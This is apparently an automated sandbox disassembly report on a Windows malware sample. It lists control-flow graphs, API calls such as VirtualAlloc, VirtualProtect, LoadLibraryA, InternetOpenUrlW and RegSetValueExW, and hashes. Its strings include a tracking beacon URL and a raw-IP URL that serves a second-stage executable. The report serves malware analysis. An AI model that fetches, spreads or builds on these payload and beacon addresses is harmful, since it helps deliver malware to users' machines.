                                                                                                control_flow_graph 142 432f19-432f29 143 432f43-432f45 142->143 144 432f2b-432f3e call 42eaa6 call 42eab9 142->144 146 432f4b-432f51 143->146 147 4332ad-4332ba call 42eaa6 call 42eab9 143->147 161 4332c5 144->161 146->147 150 432f57-432f82 146->150 166 4332c0 call 42a58d 147->166 150->147 153 432f88-432f91 150->153 156 432f93-432fa6 call 42eaa6 call 42eab9 153->156 157 432fab-432fad 153->157 156->166 159 432fb3-432fb7 157->159 160 4332a9-4332ab 157->160 159->160 165 432fbd-432fc1 159->165 163 4332c8-4332cd 160->163 161->163 165->156 168 432fc3-432fda 165->168 166->161 171 432ff7-433000 168->171 172 432fdc-432fdf 168->172 175 433002-433019 call 42eaa6 call 42eab9 call 42a58d 171->175 176 43301e-433028 171->176 173 432fe1-432fe7 172->173 174 432fe9-432ff2 172->174 173->174 173->175 179 433093-4330ad 174->179 206 4331e0 175->206 177 43302a-43302c 176->177 178 43302f-43304d call 433697 call 43345a * 2 176->178 177->178 215 43306a-433090 call 4347de 178->215 216 43304f-433065 call 42eab9 call 42eaa6 178->216 181 4330b3-4330c3 179->181 182 433181-43318a call 43d355 179->182 181->182 185 4330c9-4330cb 181->185 193 4331fd 182->193 194 43318c-43319e 182->194 185->182 191 4330d1-4330f7 185->191 191->182 196 4330fd-433110 191->196 202 433201-433219 ReadFile 193->202 194->193 198 4331a0-4331af GetConsoleMode 194->198 196->182 200 433112-433114 196->200 198->193 205 4331b1-4331b5 198->205 200->182 207 433116-433141 200->207 203 433275-433280 GetLastError 202->203 204 43321b-433221 202->204 209 433282-433294 call 42eab9 call 42eaa6 203->209 210 433299-43329c 203->210 204->203 211 433223 204->211 205->202 212 4331b7-4331d1 ReadConsoleW 205->212 213 4331e3-4331ed call 43345a 206->213 207->182 214 433143-433156 207->214 209->206 222 4332a2-4332a4 210->222 223 4331d9-4331df call 42ea83 210->223 218 433226-433238 211->218 220 4331d3 GetLastError 212->220 221 4331f2-4331fb 212->221 213->163 214->182 225 433158-43315a 214->225 215->179 216->206 218->213 228 43323a-43323e 218->228 220->223 221->218 222->213 223->206 225->182 232 43315c-43317c 225->232 235 433240-433250 call 432c35 228->235 236 433257-433262 228->236 232->182 247 433253-433255 235->247 242 433264 call 432d85 236->242 243 43326e-433273 call 432a75 236->243 248 433269-43326c 242->248 243->248 247->213 248->247
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                • Instruction ID: 8b8381e38334751f3c5fee40e88eacdf1446f1079df49a385922c4ea532b4e29
                                                                                                • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                • Instruction Fuzzy Hash: 4CC10670E04345AFDF11DFA9D841BAEBBB0BF0D305F14519AE805A7392C7789A41CB69

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 250 213003c-2130047 251 2130049 250->251 252 213004c-2130263 call 2130a3f call 2130e0f call 2130d90 VirtualAlloc 250->252 251->252 267 2130265-2130289 call 2130a69 252->267 268 213028b-2130292 252->268 273 21302ce-21303c2 VirtualProtect call 2130cce call 2130ce7 267->273 270 21302a1-21302b0 268->270 272 21302b2-21302cc 270->272 270->273 272->270 279 21303d1-21303e0 273->279 280 21303e2-2130437 call 2130ce7 279->280 281 2130439-21304b8 VirtualFree 279->281 280->279 282 21305f4-21305fe 281->282 283 21304be-21304cd 281->283 287 2130604-213060d 282->287 288 213077f-2130789 282->288 286 21304d3-21304dd 283->286 286->282 292 21304e3-2130505 LoadLibraryA 286->292 287->288 293 2130613-2130637 287->293 290 21307a6-21307b0 288->290 291 213078b-21307a3 288->291 294 21307b6-21307cb 290->294 295 213086e-21308be LoadLibraryA 290->295 291->290 296 2130517-2130520 292->296 297 2130507-2130515 292->297 298 213063e-2130648 293->298 299 21307d2-21307d5 294->299 302 21308c7-21308f9 295->302 300 2130526-2130547 296->300 297->300 298->288 301 213064e-213065a 298->301 303 21307d7-21307e0 299->303 304 2130824-2130833 299->304 305 213054d-2130550 300->305 301->288 306 2130660-213066a 301->306 307 2130902-213091d 302->307 308 21308fb-2130901 302->308 309 21307e2 303->309 310 21307e4-2130822 303->310 314 2130839-213083c 304->314 311 21305e0-21305ef 305->311 312 2130556-213056b 305->312 313 213067a-2130689 306->313 308->307 309->304 310->299 311->286 315 213056f-213057a 312->315 316 213056d 312->316 317 2130750-213077a 313->317 318 213068f-21306b2 313->318 314->295 319 213083e-2130847 314->319 321 213059b-21305bb 315->321 322 213057c-2130599 315->322 316->311 317->298 323 21306b4-21306ed 318->323 324 21306ef-21306fc 318->324 325 213084b-213086c 319->325 326 2130849 319->326 333 21305bd-21305db 321->333 322->333 323->324 327 213074b 324->327 328 21306fe-2130748 324->328 325->314 326->295 327->313 328->327 333->305
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0213024D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID: cess$kernel32.dll
                                                                                                • API String ID: 4275171209-1230238691
                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                • Instruction ID: 4d62c31e7b113053c7fec1a81403a43082a4b2b429e0d1c2d19d79fb67bed87b
                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                • Instruction Fuzzy Hash: 9F527975A01229DFDB65CF58C984BACBBB1BF09304F1580E9E94DAB351DB30AA85CF14

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C1D
                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E30
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402E41
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00402E44
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                • API String ID: 3067768807-1501832161
                                                                                                • Opcode ID: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
                                                                                                • Instruction ID: 38c4ea95430cb0d064a2c81279cd8101482ed185274a1110c797b87c00f11b19
                                                                                                • Opcode Fuzzy Hash: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
                                                                                                • Instruction Fuzzy Hash: 4C517095A65344A9E320EBB0BC46B3633B8FF58712F10543BE518CB2F2E7B49944875E

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                • String ID:
                                                                                                • API String ID: 1687354797-0
                                                                                                • Opcode ID: 8a4e3c3d63dd020857ffe5b6ac866939582f7c9482c403a14a20b35beab137be
                                                                                                • Instruction ID: ef80ad8abc8d01ee6ed88eea47d540721f1d2954bb97cc6dce8e21ba99fc2e21
                                                                                                • Opcode Fuzzy Hash: 8a4e3c3d63dd020857ffe5b6ac866939582f7c9482c403a14a20b35beab137be
                                                                                                • Instruction Fuzzy Hash: EB215172C042489ADF15EBF5D8417DEB7F8AF08318F54407FE400B62C1DB7D89448A69

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • std::_Cnd_initX.LIBCPMT ref: 00405812
                                                                                                • __Cnd_signal.LIBCPMT ref: 0040581E
                                                                                                • std::_Cnd_initX.LIBCPMT ref: 00405833
                                                                                                • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 0040583A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                • String ID:
                                                                                                • API String ID: 2059591211-0
                                                                                                • Opcode ID: b1940bdf887fb805db358662575d14e7d2157d46e353a8059db40e0b34531568
                                                                                                • Instruction ID: aebd2ac95218272d728fe4b8aabd0d06745c53d3a4d3bf2acc4ab23466c53149
                                                                                                • Opcode Fuzzy Hash: b1940bdf887fb805db358662575d14e7d2157d46e353a8059db40e0b34531568
                                                                                                • Instruction Fuzzy Hash: 5FF082324007009BE7313772C80770A77A0AF04319F54883EF456769E2DBBEA8585A5D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 415 402956-4029c1 call 426820 call 42a33b call 42b444 call 402819 424 4029c3-4029c6 415->424 425 4029cf-4029e9 call 404329 call 40f8c5 415->425 424->425 426 4029c8-4029cc 424->426 426->425 428 4029ce 426->428 428->425
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00402985
                                                                                                • __fassign.LIBCMT ref: 00402995
                                                                                                  • Part of subcall function 00402819: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                • String ID: +@
                                                                                                • API String ID: 2843524283-4068139069
                                                                                                • Opcode ID: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
                                                                                                • Instruction ID: 360ce0a8eae9c999d09f2756f3db8bce049cda3fb2da0c45bd643548fbd10a56
                                                                                                • Opcode Fuzzy Hash: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
                                                                                                • Instruction Fuzzy Hash: F901D6B1E0011C5ADB24EA25ED46AEF77689B41308F1401BBA605E31C1D9785E45CA99

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastThread
                                                                                                • String ID: <(@
                                                                                                • API String ID: 1611280651-4189137628
                                                                                                • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                • Instruction ID: e0787552ab8efb8db6d324a59155cd7370fffab00d3424d568e81b2c5b813918
                                                                                                • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                • Instruction Fuzzy Hash: 7EF0A471A00614AFDB04EFB1D80AA6D3B70FF09715F10056AF40257292CB7969558B68

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 452 42e104-42e10f 453 42e111-42e123 call 42eab9 call 42a58d 452->453 454 42e125-42e138 call 42e0bb 452->454 470 42e175-42e178 453->470 460 42e166 454->460 461 42e13a-42e157 CreateThread 454->461 464 42e168-42e174 call 42e02d 460->464 462 42e179-42e17e 461->462 463 42e159-42e165 GetLastError call 42ea83 461->463 468 42e180-42e183 462->468 469 42e185-42e187 462->469 463->460 464->470 468->469 469->464
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(?,?,Function_0002DFB0,00000000,?,?), ref: 0042E14D
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,0040CF04,00000000,00000000,?,?,00000000,?), ref: 0042E159
                                                                                                • __dosmaperr.LIBCMT ref: 0042E160
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastThread__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2744730728-0
                                                                                                • Opcode ID: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
                                                                                                • Instruction ID: 0446f91cba5bc1877a5460ce95bae766c471c3d01d015a917539d7ef00797947
                                                                                                • Opcode Fuzzy Hash: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
                                                                                                • Instruction Fuzzy Hash: FF01D236600139BBDB119FA3FC05AAF7B6AEF85720F40003AF80582210DB358D21C7A9

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 473 434745-43475d call 439911 476 434770-434786 SetFilePointerEx 473->476 477 43475f-434764 call 42eab9 473->477 478 434797-4347a1 476->478 479 434788-434795 GetLastError call 42ea83 476->479 484 43476a-43476e 477->484 483 4347a3-4347b8 478->483 478->484 479->484 485 4347bd-4347c2 483->485 484->485
                                                                                                APIs
                                                                                                • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDCB,00000000,00000002,0040DDCB,00000000,?,?,?,004347F4,00000000,00000000,0040DDCB,00000002), ref: 0043477E
                                                                                                • GetLastError.KERNEL32(?,004347F4,00000000,00000000,0040DDCB,00000002,?,0042C151,?,00000000,00000000,00000001,?,0040DDCB,?,0042C206), ref: 00434788
                                                                                                • __dosmaperr.LIBCMT ref: 0043478F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2336955059-0
                                                                                                • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                • Instruction ID: 754c6ade6be4612c7e0c4d55d151f31ddb378772f23eed9c1438f533fa7de6e2
                                                                                                • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                • Instruction Fuzzy Hash: 92012836710114ABDB159FAADC058EE7B2AEFCA721F24020AF81597290EB74ED528794

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 487 402ba3-402bcf RegCreateKeyExW 488 402bd1-402be3 RegSetValueExW 487->488 489 402be5-402be8 487->489 488->489 490 402bf3-402bf9 489->490 491 402bea-402bed RegCloseKey 489->491 491->490
                                                                                                APIs
                                                                                                • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BC5
                                                                                                • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BDD
                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BED
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID:
                                                                                                • API String ID: 1818849710-0
                                                                                                • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                • Instruction ID: 504cdbf1e8d79b6d7283afc99896261950e1a919ac783b79018d19fe3f3d7e53
                                                                                                • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                • Instruction Fuzzy Hash: 16F0B4B650011CFFEB214F94DD89DABBA7CEB047E9F100175FA01B2150D6B19E009664

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 492 42e064-42e071 call 431f4e 495 42e073-42e076 ExitThread 492->495 496 42e07c-42e084 492->496 496->495 497 42e086-42e08a 496->497 498 42e091-42e097 497->498 499 42e08c call 4354e6 497->499 501 42e0a4-42e0aa 498->501 502 42e099-42e09b 498->502 499->498 501->495 504 42e0ac-42e0ae 501->504 502->501 503 42e09d-42e09e CloseHandle 502->503 503->501 504->495 505 42e0b0-42e0ba FreeLibraryAndExitThread 504->505
                                                                                                APIs
                                                                                                  • Part of subcall function 00431F4E: GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
                                                                                                  • Part of subcall function 00431F4E: _free.LIBCMT ref: 00431F88
                                                                                                  • Part of subcall function 00431F4E: SetLastError.KERNEL32(00000000), ref: 00431FBC
                                                                                                • ExitThread.KERNEL32 ref: 0042E076
                                                                                                • CloseHandle.KERNEL32(?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E09E
                                                                                                • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E0B4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                • String ID:
                                                                                                • API String ID: 1198197534-0
                                                                                                • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                • Instruction ID: fd9bad38e730a393213bf68ec19d44fd98ecce05ba50bc9e79acb20fd3a4735a
                                                                                                • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                • Instruction Fuzzy Hash: 8CF05E342006347BEB319F37EC08A5B7A98AF05725F584756B924C22A1DBBCDD82869C

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 506 402394-4023a2 507 402557-402559 PostQuitMessage 506->507 508 4023a8-4023ad 506->508 509 40255f-402564 507->509 510 4023c6-4023cd 508->510 511 4023af-4023c1 DefWindowProcW 508->511 512 4023d4-4023db 510->512 513 4023cf call 401d9a 510->513 511->509 512->509 515 4023e1-402555 call 4010ba call 4029ea 512->515 513->512 515->509
                                                                                                APIs
                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 004023BB
                                                                                                • PostQuitMessage.USER32(00000000), ref: 00402559
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePostProcQuitWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3873111417-0
                                                                                                • Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                • Instruction ID: bf68dd1ed3332b821989bb5fb7b10a9ee1776f212d734df2d08f0bb157d40bf1
                                                                                                • Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                • Instruction Fuzzy Hash: 1A412D11A64380A5E630FFA5BC55B2533B0FF54712F10653BE524DB2B6E3B28544C75E
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00001562), ref: 00401562
                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                  • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$Sleep
                                                                                                • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                • API String ID: 3358372957-3120454669
                                                                                                • Opcode ID: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
                                                                                                • Instruction ID: 7c00d7bba67f06605ca45885bb35db497ce8a02c3eee20c143d632ed8421155e
                                                                                                • Opcode Fuzzy Hash: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
                                                                                                • Instruction Fuzzy Hash: 49317955A6538094E330DFA0BC56B252370FF64B52F50653BD60CCB2B2E7A18587C75E
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000400,?,?,02130223,?,?), ref: 02130E19
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,02130223,?,?), ref: 02130E1E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                • Instruction ID: 141337286ceb6be3880347a732b0624d5417ee66cd2ec71782f629bcf62dde42
                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                • Instruction Fuzzy Hash: 7DD0123124512877D7013A94DC09BCD7B5CDF09B66F108021FB0DD9080C770954046E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                • Instruction ID: bbb5b7410918ed3a19f08aeefc1504024edbbdc2131895f71ed4605d11f41fec
                                                                                                • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                • Instruction Fuzzy Hash: EB51E971A00214AFDB10DF59C844BEA7BA1EFC9364F19929AF8099B391C735FD42CB94
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock
                                                                                                • String ID:
                                                                                                • API String ID: 2638373210-0
                                                                                                • Opcode ID: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                                                                • Instruction ID: 4d174249788eeb6afcd1119ee109bea02bf0543b951493d32b1ba631c5db93a5
                                                                                                • Opcode Fuzzy Hash: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                                                                • Instruction Fuzzy Hash: 18319CB1604716AFC710DE2AC88091ABFA8BF84351F04853EFC44A7391D779EA548BCA
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_catch
                                                                                                • String ID:
                                                                                                • API String ID: 3886170330-0
                                                                                                • Opcode ID: 9f23ae79560e67051bcf85e0cb16db66ac0d8ac468d59dcc29faa4e840d6ae8b
                                                                                                • Instruction ID: 32bf592214548051ea082348c4a835d7945df8af17cd6667f715d9d6ea4d768c
                                                                                                • Opcode Fuzzy Hash: 9f23ae79560e67051bcf85e0cb16db66ac0d8ac468d59dcc29faa4e840d6ae8b
                                                                                                • Instruction Fuzzy Hash: 7B2190317006058BDB18EF69D595A6B77A1EB88304F04443EE946AB7C6C639DE00CA98
                                                                                                APIs
                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                • String ID:
                                                                                                • API String ID: 323602529-0
                                                                                                • Opcode ID: 279f92b60ac38775abde35fd2196f449753def5a4b0c94d1bc817f47e22c19ac
                                                                                                • Instruction ID: a96161e1099ed2e4ebc89c8b3bfd47f038f5993eec498a984b7603ffbfb0c6fe
                                                                                                • Opcode Fuzzy Hash: 279f92b60ac38775abde35fd2196f449753def5a4b0c94d1bc817f47e22c19ac
                                                                                                • Instruction Fuzzy Hash: C8312BB4D002199BDB14EFA5D881AEDBBB4BF48304F5085AEE415B3281DB786A48CF54
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_catch
                                                                                                • String ID:
                                                                                                • API String ID: 3886170330-0
                                                                                                • Opcode ID: 5a7dafe199dd573de284644cb3d1f7223cee9f8001d16bbeee69694dc4afe46c
                                                                                                • Instruction ID: df22ffae6d2fe3b800e0c8e4f2770173a5e1bd04bbee8454eb0c8e7fe139aa3e
                                                                                                • Opcode Fuzzy Hash: 5a7dafe199dd573de284644cb3d1f7223cee9f8001d16bbeee69694dc4afe46c
                                                                                                • Instruction Fuzzy Hash: C1215B70A00205EFCB15DF55C484EAEBBB5BF88705F14816EE805AB3A1C778AE50DF94
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wsopen_s
                                                                                                • String ID:
                                                                                                • API String ID: 3347428461-0
                                                                                                • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                • Instruction ID: ab2784c25bcc6a383b761dc233afc1089a93ea485bdb2d241c4dcfca41164893
